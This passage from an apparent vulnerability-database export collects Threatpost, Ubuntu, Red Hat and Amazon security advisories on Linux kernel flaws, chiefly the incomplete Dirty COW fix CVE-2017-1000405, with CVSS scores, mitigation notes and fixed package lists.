# echo 0 > /sys/kernel/mm/transparent_hugepage/use_zero_page Disabling huge pages: It is possible to mitigate this flaw by disabling hugepages on a system,\u201d according to a [description of mitigations steps](<https://access.redhat.com/security/cve/CVE-2017-1000405>).\n\n\u201cThe real deal here is the astonishing fact that such a hyped vulnerability was patched incompletely,\u201d Shapiro said.\n", "modified": "2017-12-01T11:43:06", "published": "2017-12-01T11:43:06", "id": "THREATPOST:A28CC7C8B76DAF5EBFF24CE8575A2087", "href": "https://threatpost.com/flaw-found-in-dirty-cow-patch/129064/", "type": "threatpost", "title": "Flaw Found In Dirty COW Patch", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-15T01:39:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)", "edition": 6, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3510-1", "href": "https://ubuntu.com/security/notices/USN-3510-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:43:16", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "USN-3510-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. 
This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 ESM.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)", "edition": 7, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3510-2", "href": "https://ubuntu.com/security/notices/USN-3510-2", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:37:22", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. 
(CVE-2017-1000405)", "edition": 6, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3511-1", "href": "https://ubuntu.com/security/notices/USN-3511-1", "title": "Linux kernel (Azure) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:10", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "USN-3508-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.04. \nThis update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 17.04 for Ubuntu \n16.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nYonggang Guo discovered that a race condition existed in the driver \nsubsystem in the Linux kernel. A local attacker could use this to possibly \ngain administrative privileges. (CVE-2017-12146)", "edition": 5, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3508-2", "href": "https://ubuntu.com/security/notices/USN-3508-2", "title": "Linux kernel (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:35:01", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. 
A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nYonggang Guo discovered that a race condition existed in the driver \nsubsystem in the Linux kernel. A local attacker could use this to possibly \ngain administrative privileges. (CVE-2017-12146)", "edition": 6, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3508-1", "href": "https://ubuntu.com/security/notices/USN-3508-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:56", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "USN-3509-2 fixed vulnerabilities in the Linux Hardware Enablement \nkernel for Ubuntu 14.04 LTS. Unfortunately, it also introduced a \nregression that prevented the Ceph network filesystem from being \nused. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. 
(CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-16643)", "edition": 6, "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "id": "USN-3509-4", "href": "https://ubuntu.com/security/notices/USN-3509-4", "title": "Linux kernel (Xenial HWE) regression", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:40:18", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "USN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). 
(CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-16643)", "edition": 6, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3509-2", "href": "https://ubuntu.com/security/notices/USN-3509-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:34:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "USN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. Unfortunately, it also introduced a regression that prevented the \nCeph network filesystem from being used. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. 
A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-16643)", "edition": 6, "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "id": "USN-3509-3", "href": "https://ubuntu.com/security/notices/USN-3509-3", "title": "Linux kernel regression", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:13", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. 
(CVE-2017-16643)", "edition": 6, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3509-1", "href": "https://ubuntu.com/security/notices/USN-3509-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:41:53", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15306", "CVE-2017-15299", "CVE-2017-12193", "CVE-2017-15951", "CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nEric Biggers discovered that the key management subsystem in the Linux \nkernel did not properly restrict adding a key that already exists but is \nuninstantiated. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code. (CVE-2017-15299)\n\nIt was discovered that a null pointer dereference error existed in the \nPowerPC KVM implementation in the Linux kernel. A local attacker could use \nthis to cause a denial of service (system crash). (CVE-2017-15306)\n\nEric Biggers discovered a race condition in the key management subsystem of \nthe Linux kernel around keys in a negative state. 
A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-15951)", "edition": 6, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3507-2", "href": "https://ubuntu.com/security/notices/USN-3507-2", "title": "Linux kernel (GCP) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:47", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195", "CVE-2017-1000405"], "description": "The kernel-alt packages provide the Linux kernel version 4.x.\n\nSecurity Fix(es):\n\n* A flaw was found in the patches used to fix the 'dirtycow' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages. (CVE-2017-1000405)\n\nRed Hat would like to thank Eylon Ben Yaakov and Daniel Shapiro for reporting this issue.\n\nBug Fix(es):\n\n* Previously, Red Hat Enterprise Linux 7.4 with the kernel version provided by the kernel-alt package, did not support turning off transactional memory (TM) on the POWER9 systems. With this update it is now possible to turn off TM on the POWER9 systems. (BZ#1509974)\n\n* Due to a bug in the ixgbe and i40e drivers, the socket buffer list (skb list) in some cases got corrupted when running Red Hat Enterprise Linux 7.4 with the kernel version provided by the kernel-alt package on the POWER9 systems. Consequently, a kernel panic occurred. This update fixes ixgbe and i40e, and the kernel no longer panics due to this behavior. (BZ#1518412)\n\n* Users can lower the max_sectors_kb setting in the sysfs file system to accommodate certain workloads. Previously, users needed to set the maximum I/O size to either the block layer default or the optional preferred I/O size reported by the device. 
This update fixes the scsi driver to keep the current heuristic function for the initial setting of max_sectors_kb. As a result, for subsequent invocations, the driver now only updates the current queue limit if it exceeds the capabilities of the hardware. (BZ#1518432)\n\n* When performing full-bootme tests on Boston ESS systems running Red Hat Enterprise Linux 7.4 with the kernel version provided in the kernel-alt package, a kernel panic occurred and the operating system dropped into the XMON software. This update fixes the Multi-Queue Block IO Queueing Mechanism (blk-mq), and the kernel no longer panics in these circumstances. (BZ#1518433)\n\n* When running the stress test on the file system with the gssstress command, and pulling one disk from one recovery group, \"kernel I/O error\" was reported, and gssstress became unresponsive. Gssstress now works as expected under the described circumstances. (BZ#1522645)\n\n* When using the fwupdate_xl710 utility to apply updates for NVM Intel Ethernet Converged Network Adapter XL710 on machines running Red Hat Enterprise Linux 7.4 with the kernel version provided in the kernel-alt package, a deadlock sometimes occurred when the i40e driver was acquiring access to the Non-Volatile Memory (NVM) of the device. Consequently, NVM acquire timeouts occurred, the firmware update failed with the following error message: \"Failed Acquiring NVM resource for read err=-53 status=0xa\", and left the device's memory in a corrupted state. This update fixes the i40e driver, and the firmware updates no longer fail due to this behavior. (BZ#1522843)\n\n* Previously, on POWER9 systems with more than 100 Pstates, the cpufreq driver did not handle the cases when the NxN matrix denominated transition table (trans_table) overflowed beyond the PAGE_SIZE boundary correctly. 
Consequently, reading trans_table for any of the CPUs failed with the following error:\n\n\"fill_read_buffer: show+0x0/0xa0 returned bad count\"\n\nWith this update reading trans_table for any of the CPUs now proceeds as expected under the described circumstances. (BZ#1522844)\n\n* Previously, the /sys/firmware/opal/exports directory did not contain an export node. Consequently, a range of memory in the Open Power Abstraction Layer (OPAL) that the operating system attempted to export to user space for debugging purposes was not available. With this update the sysfs file under /sys/firmware/opal/exports is now available for each property found there, and this file can be used for debugging purposes. (BZ#1522845)", "modified": "2018-03-19T16:23:48", "published": "2018-01-25T15:47:54", "id": "RHSA-2018:0180", "href": "https://access.redhat.com/errata/RHSA-2018:0180", "type": "redhat", "title": "(RHSA-2018:0180) Important: kernel-alt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7913", "CVE-2016-8633", "CVE-2017-1000407", "CVE-2017-11600", "CVE-2017-12190", "CVE-2017-13215", "CVE-2017-16939", "CVE-2017-17558", "CVE-2018-1068", "CVE-2018-12126", "CVE-2018-12127", "CVE-2018-12130", "CVE-2018-18559", "CVE-2018-3665", "CVE-2019-11091"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A flaw was found in the implementation of the \"fill buffer\", a mechanism used by modern CPUs when a cache-miss is made on L1 CPU cache. If an attacker can generate a load operation that would create a page fault, the execution will continue speculatively with incorrect data from the fill buffer while the data is fetched from higher level caches. This response time can be measured to infer data in the fill buffer. 
(CVE-2018-12130)\n\n* Modern Intel microprocessors implement hardware-level micro-optimizations to improve the performance of writing data back to CPU caches. The write operation is split into STA (STore Address) and STD (STore Data) sub-operations. These sub-operations allow the processor to hand-off address generation logic into these sub-operations for optimized writes. Both of these sub-operations write to a shared distributed processor structure called the 'processor store buffer'. As a result, an unprivileged attacker could use this flaw to read private data resident within the CPU's processor store buffer. (CVE-2018-12126)\n\n* Microprocessors use a \u2018load port\u2019 subcomponent to perform load operations from memory or IO. During a load operation, the load port receives data from the memory or IO subsystem and then provides the data to the CPU registers and operations in the CPU\u2019s pipelines. Stale load operations results are stored in the 'load port' table until overwritten by newer operations. Certain load-port operations triggered by an attacker can be used to reveal data about previous stale requests leaking data back to the attacker via a timing side-channel. (CVE-2018-12127)\n\n* Uncacheable memory on some microprocessors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access. 
(CVE-2019-11091)\n\n* kernel: Buffer overflow in firewire driver via crafted incoming packets (CVE-2016-8633)\n\n* kernel: crypto: privilege escalation in skcipher_recvmsg function (CVE-2017-13215)\n\n* Kernel: ipsec: xfrm: use-after-free leading to potential privilege escalation (CVE-2017-16939)\n\n* kernel: Out-of-bounds write via userland offsets in ebt_entry struct in netfilter/ebtables.c (CVE-2018-1068)\n\n* kernel: Use-after-free due to race condition in AF_PACKET implementation (CVE-2018-18559)\n\n* kernel: media: use-after-free in [tuner-xc2028] media driver (CVE-2016-7913)\n\n* kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink message (CVE-2017-11600)\n\n* kernel: memory leak when merging buffers in SCSI IO vectors (CVE-2017-12190)\n\n* kernel: Unallocated memory access by malicious USB device via bNumInterfaces overflow (CVE-2017-17558)\n\n* Kernel: KVM: DoS via write flood to I/O port 0x80 (CVE-2017-1000407)\n\n* Kernel: FPU state information leakage via lazy FPU restore (CVE-2018-3665)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* rwsem in inconsistent state leading system to hung (BZ#1690321)\n\n* efi_bgrt_init fails to ioremap error during boot (BZ#1692284)", "modified": "2019-05-14T22:49:05", "published": "2019-05-14T22:09:09", "id": "RHSA-2019:1170", "href": "https://access.redhat.com/errata/RHSA-2019:1170", "type": "redhat", "title": "(RHSA-2019:1170) Important: kernel security and bug fix update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0861", "CVE-2017-16649", "CVE-2017-15115", "CVE-2017-16994", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16643", "CVE-2016-5195", "CVE-2017-1000405", "CVE-2017-16645"], 
"description": "**Issue Overview:**\n\nA flaw was found in the patches used to fix the 'dirtycow' vulnerability ([CVE-2016-5195 __](<https://access.redhat.com/security/cve/CVE-2016-5195>)). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages. ([CVE-2017-1000405 __](<https://access.redhat.com/security/cve/CVE-2017-1000405>))\n\nLinux kernel Virtualization Module (CONFIG_KVM) for the Intel processor family (CONFIG_KVM_INTEL) is vulnerable to a DoS issue. It could occur if a guest was to flood the I/O port 0x80 with write requests. A guest user could use this flaw to crash the host kernel resulting in DoS. ([CVE-2017-1000407 __](<https://access.redhat.com/security/cve/CVE-2017-1000407>))\n\nA BUG in drivers/net/usb/asix_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16647 __](<https://access.redhat.com/security/cve/CVE-2017-16647>))\n\nA BUG in drivers/media/usb/dvb-usb/dib0700_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (BUG and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16646 __](<https://access.redhat.com/security/cve/CVE-2017-16646>))\n\nThe ims_pcu_get_cdc_union_desc function in drivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (ims_pcu_parse_cdc_data out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. 
([CVE-2017-16645 __](<https://access.redhat.com/security/cve/CVE-2017-16645>))\n\nThe parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16643 __](<https://access.redhat.com/security/cve/CVE-2017-16643>))\n\nThe walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call. ([CVE-2017-16994 __](<https://access.redhat.com/security/cve/CVE-2017-16994>))\n\nThe qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16650 __](<https://access.redhat.com/security/cve/CVE-2017-16650>))\n\nThe usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16649 __](<https://access.redhat.com/security/cve/CVE-2017-16649>))\n\nA vulnerability was found in the Linux kernel when peeling off an association to the socket in another network namespace. All transports in this association are not to be rehashed and keep using the old key in hashtable, thus removing transports from hashtable when closing the socket, all transports are being freed. Later on a use-after-free issue could be caused when looking up an association and dereferencing the transports. 
([CVE-2017-15115 __](<https://access.redhat.com/security/cve/CVE-2017-15115>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-4.9.70-22.55.amzn1.i686 \n kernel-4.9.70-22.55.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.70-22.55.amzn1.i686 \n kernel-debuginfo-4.9.70-22.55.amzn1.i686 \n perf-debuginfo-4.9.70-22.55.amzn1.i686 \n kernel-tools-devel-4.9.70-22.55.amzn1.i686 \n kernel-headers-4.9.70-22.55.amzn1.i686 \n kernel-tools-4.9.70-22.55.amzn1.i686 \n kernel-devel-4.9.70-22.55.amzn1.i686 \n kernel-tools-debuginfo-4.9.70-22.55.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.70-22.55.amzn1.noarch \n \n src: \n kernel-4.9.70-22.55.amzn1.src \n \n x86_64: \n kernel-tools-4.9.70-22.55.amzn1.x86_64 \n kernel-devel-4.9.70-22.55.amzn1.x86_64 \n kernel-headers-4.9.70-22.55.amzn1.x86_64 \n kernel-4.9.70-22.55.amzn1.x86_64 \n perf-4.9.70-22.55.amzn1.x86_64 \n kernel-tools-devel-4.9.70-22.55.amzn1.x86_64 \n kernel-tools-debuginfo-4.9.70-22.55.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.70-22.55.amzn1.x86_64 \n perf-debuginfo-4.9.70-22.55.amzn1.x86_64 \n kernel-debuginfo-4.9.70-22.55.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2017-12-21T00:02:00", "published": "2017-12-21T00:02:00", "id": "ALAS-2017-937", "href": "https://alas.aws.amazon.com/ALAS-2017-937.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T12:37:32", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5753", "CVE-2017-17741", "CVE-2018-1000028", "CVE-2018-5344", "CVE-2016-5195", "CVE-2018-5750", "CVE-2017-1000405"], "description": "**Issue Overview:**\n\nStack-based out-of-bounds read via vmcall instruction \nLinux kernel compiled with the KVM virtualization (CONFIG_KVM) support is vulnerable to an out-of-bounds read access issue. 
It could occur when emulating vmcall instructions invoked by a guest. A guest user/process could use this flaw to disclose kernel memory bytes.([CVE-2017-17741 __](<https://access.redhat.com/security/cve/CVE-2017-17741>))\n\ndrivers/block/loop.c mishandles lo_release serialization allowing denial-of-service \nA flaw was found in the Linux kernel's handling of loopback devices. An attacker, who has permissions to setup loopback disks, may create a denial of service or other unspecified actions. ([CVE-2018-5344 __](<https://access.redhat.com/security/cve/CVE-2018-5344>))\n\npmd can become dirty without going through a COW cycle \nA flaw was found in the patches used to fix the 'dirtycow' vulnerability ([CVE-2016-5195 __](<https://access.redhat.com/security/cve/CVE-2016-5195>)). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.([CVE-2017-1000405 __](<https://access.redhat.com/security/cve/CVE-2017-1000405>))\n\nImproper sorting of GIDs in nfsd can lead to incorrect permissions being applied \nLinux kernel contains a Incorrect Access Control vulnerability in NFS server (nfsd) that can result in remote users reading or writing files they should not be able to via NFS. This attack appear to be exploitable via NFS server must export a filesystem with the \"rootsquash\" options enabled. This vulnerability appears to have been fixed in after commit 1995266727fa. 
([CVE-2018-1000028 __](<https://access.redhat.com/security/cve/CVE-2018-1000028>))\n\nKernel address information leak in drivers/acpi/sbshc.c:acpi_smbus_hc_add() function potentially allowing KASLR bypass \nThe acpi_smbus_hc_add function in drivers/acpi/sbshc.c in the Linux kernel, through 4.14.15, allows local users to obtain sensitive address information by reading dmesg data from an SBS HC printk call.([CVE-2018-5750 __](<https://access.redhat.com/security/cve/CVE-2018-5750>))\n\nSpeculative execution bounds-check bypass \nAn industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant [CVE-2017-5753 __](<https://access.redhat.com/security/cve/CVE-2017-5753>) triggers the speculative execution by performing a bounds-check bypass. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall boundary and read privileged memory by conducting targeted cache side-channel attacks.([CVE-2017-5753 __](<https://access.redhat.com/security/cve/CVE-2017-5753>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n noarch: \n kernel-doc-4.9.81-44.57.amzn2.noarch \n \n src: \n kernel-4.9.81-44.57.amzn2.src \n \n x86_64: \n kernel-4.9.81-44.57.amzn2.x86_64 \n kernel-headers-4.9.81-44.57.amzn2.x86_64 \n kernel-debuginfo-common-x86_64-4.9.81-44.57.amzn2.x86_64 \n perf-4.9.81-44.57.amzn2.x86_64 \n perf-debuginfo-4.9.81-44.57.amzn2.x86_64 \n python-perf-4.9.81-44.57.amzn2.x86_64 \n python-perf-debuginfo-4.9.81-44.57.amzn2.x86_64 \n kernel-tools-4.9.81-44.57.amzn2.x86_64 \n kernel-tools-devel-4.9.81-44.57.amzn2.x86_64 \n kernel-tools-debuginfo-4.9.81-44.57.amzn2.x86_64 \n kernel-devel-4.9.81-44.57.amzn2.x86_64 \n kernel-debuginfo-4.9.81-44.57.amzn2.x86_64 \n \n \n", "edition": 1, "modified": "2018-02-20T21:23:00", "published": "2018-02-20T21:23:00", "id": "ALAS2-2018-956", "href": "https://alas.aws.amazon.com/AL2/ALAS-2018-956.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T12:37:49", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5753", "CVE-2017-17741", "CVE-2018-1000028", "CVE-2018-5344", "CVE-2016-5195", "CVE-2018-5750", "CVE-2017-1000405"], "description": "**Issue Overview:**\n\nKernel address information leak in drivers/acpi/sbshc.c:acpi_smbus_hc_add() function potentially allowing KASLR bypass \nThe acpi_smbus_hc_add function in drivers/acpi/sbshc.c in the Linux kernel, through 4.14.15, allows local users to obtain sensitive address information by 